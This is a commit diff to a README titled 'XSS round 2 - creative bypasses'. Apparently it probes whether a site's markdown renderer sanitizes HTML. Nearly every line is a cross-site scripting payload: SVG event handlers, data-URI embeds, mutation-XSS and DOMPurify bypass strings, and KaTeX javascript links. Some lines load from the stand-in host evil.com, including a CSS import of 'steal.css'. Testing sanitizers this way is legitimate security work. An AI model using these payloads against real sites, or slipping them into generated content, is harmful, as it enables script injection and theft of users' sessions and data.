XSS round 2 - creative bypasses
Browse files
README.md
CHANGED
|
@@ -1,71 +1,57 @@
|
|
| 1 |
---
|
| 2 |
license: mit
|
| 3 |
---
|
| 4 |
-
# XSS
|
| 5 |
|
| 6 |
-
##
|
|
|
|
| 7 |
|
| 8 |
-
|
|
|
|
| 9 |
|
| 10 |
-
## Test
|
| 11 |
-
<
|
| 12 |
|
| 13 |
-
## Test
|
| 14 |
-
<svg onload=
|
| 15 |
|
| 16 |
-
## Test
|
| 17 |
-
<
|
| 18 |
-
<summary>Click</summary>
|
| 19 |
-
test
|
| 20 |
-
</details>
|
| 21 |
|
| 22 |
-
## Test
|
| 23 |
-
<
|
| 24 |
|
| 25 |
-
## Test
|
| 26 |
-
<
|
| 27 |
|
| 28 |
-
## Test
|
| 29 |
-
<
|
| 30 |
|
| 31 |
-
## Test
|
| 32 |
-
<
|
| 33 |
|
| 34 |
-
## Test
|
| 35 |
-
<
|
| 36 |
|
| 37 |
-
## Test
|
| 38 |
-
|
| 39 |
|
| 40 |
-
## Test
|
| 41 |
-
<
|
|
|
|
| 42 |
|
| 43 |
-
## Test
|
| 44 |
-
<
|
| 45 |
|
| 46 |
-
## Test
|
| 47 |
-
<
|
| 48 |
|
| 49 |
-
## Test
|
| 50 |
-
<
|
|
|
|
| 51 |
|
| 52 |
-
## Test
|
| 53 |
-
|
| 54 |
|
| 55 |
-
## Test
|
| 56 |
-
|
| 57 |
-
|
| 58 |
-
## Test 16: HTML entity bypass
|
| 59 |
-
<img src=x onerror=alert(1)>
|
| 60 |
-
|
| 61 |
-
## Test 17: Data URI
|
| 62 |
-
<a href="data:text/html,<script>alert(1)</script>">data uri</a>
|
| 63 |
-
|
| 64 |
-
## Test 18: Form action
|
| 65 |
-
<form action="javascript:alert('form')"><button>Submit</button></form>
|
| 66 |
-
|
| 67 |
-
## Test 19: Meta refresh
|
| 68 |
-
<meta http-equiv="refresh" content="0;url=javascript:alert('meta')">
|
| 69 |
-
|
| 70 |
-
## Test 20: Template
|
| 71 |
-
<template><script>alert('template')</script></template>
|
|
|
|
| 1 |
---
|
| 2 |
license: mit
|
| 3 |
---
|
| 4 |
+
# XSS Round 2
|
| 5 |
|
| 6 |
+
## Test A: SVG animate
|
| 7 |
+
<svg><animate onbegin="alert(1)" attributeName="x" dur="1s">
|
| 8 |
|
| 9 |
+
## Test B: SVG set
|
| 10 |
+
<svg><set attributeName="onmouseover" to="alert(1)">
|
| 11 |
|
| 12 |
+
## Test C: SVG foreignObject
|
| 13 |
+
<svg><foreignObject><body onload="alert(1)"></body></foreignObject></svg>
|
| 14 |
|
| 15 |
+
## Test D: SVG use external
|
| 16 |
+
<svg><use href="data:image/svg+xml,<svg onload=alert(1)>"></use></svg>
|
| 17 |
|
| 18 |
+
## Test E: Style tag
|
| 19 |
+
<style>body{background:red}</style>
|
|
|
|
|
|
|
|
|
|
| 20 |
|
| 21 |
+
## Test F: Base tag
|
| 22 |
+
<base href="https://evil.com/">
|
| 23 |
|
| 24 |
+
## Test G: Object with SVG
|
| 25 |
+
<embed src="data:image/svg+xml,<svg onload=alert(1)>">
|
| 26 |
|
| 27 |
+
## Test H: Anchor target
|
| 28 |
+
<a href="https://evil.com" target="_blank" rel="">Click me</a>
|
| 29 |
|
| 30 |
+
## Test I: noscript
|
| 31 |
+
<noscript><img src=x onerror=alert(1)></noscript>
|
| 32 |
|
| 33 |
+
## Test J: CSS import
|
| 34 |
+
<style>@import url("https://evil.com/steal.css")</style>
|
| 35 |
|
| 36 |
+
## Test K: MathJax/KaTeX
|
| 37 |
+
$$\href{javascript:alert(1)}{click}$$
|
| 38 |
|
| 39 |
+
## Test L: Tab/newline bypass
|
| 40 |
+
<img src=x on error="alert(1)">
|
| 41 |
+
<a hre f="javascript:alert(1)">test</a>
|
| 42 |
|
| 43 |
+
## Test M: HTML comment bypass
|
| 44 |
+
<img src=x onerror="alert(1)"--!>
|
| 45 |
|
| 46 |
+
## Test N: Mutation XSS
|
| 47 |
+
<svg><style><img src=x onerror=alert(1)>
|
| 48 |
|
| 49 |
+
## Test O: DOMPurify bypass attempts
|
| 50 |
+
<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>
|
| 51 |
+
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">
|
| 52 |
|
| 53 |
+
## Test P: noembed
|
| 54 |
+
<noembed><img src=x onerror=alert(1)></noembed>
|
| 55 |
|
| 56 |
+
## Test Q: Title element
|
| 57 |
+
<svg><title><img src=x onerror=alert(1)></title></svg>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|